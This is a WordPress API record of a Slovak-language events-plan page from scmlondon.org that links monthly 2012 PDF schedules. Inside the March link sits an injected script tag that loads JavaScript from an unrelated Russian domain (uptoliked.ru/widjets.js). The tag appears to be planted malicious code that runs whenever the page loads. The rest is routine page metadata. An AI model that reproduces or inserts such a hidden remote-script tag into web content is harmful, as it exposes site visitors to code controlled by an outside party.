{"id":12166,"date":"2012-01-01T11:47:25","date_gmt":"2012-01-01T11:47:25","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=12166"},"modified":"2017-12-18T13:14:22","modified_gmt":"2017-12-18T13:14:22","slug":"plan-podujati-v-roku-2012","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=12166","title":{"rendered":"PL\u00c1N PODUJAT\u00cd V ROKU 2012"},"content":{"rendered":"<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/01_JANU%C3%81R-20121.pdf\">01_JANU\u00c1R 2012<\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/02_FEBRU%C3%81R-20121.pdf\">02_FEBRU\u00c1R 2012<\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/03_MAREC-20121.pdf\">03_MAREC 2012<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/04_APR%C3%8DL-20121.pdf\">04_APR\u00cdL 2012<\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/05_M\u00c1J-20125.pdf\">05_M\u00c1J 2012<\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/01\/06_J%C3%9AN-20121.pdf\">06_J\u00daN 2012<\/a><\/p>\n<pre><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>01_JANU\u00c1R 2012 02_FEBRU\u00c1R 2012 03_MAREC 2012 04_APR\u00cdL 2012 05_M\u00c1J 2012 06_J\u00daN 2012<\/p>\n","protected":false},"author":417,"featured_media":0,"parent":18879,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-12166","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/12166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12166"}],"version-history":[{"count":10,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/12166\/revisions"}],"predecessor-version":[{"id":24136,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/12166\/revisions\/24136"}],"up":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18879"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}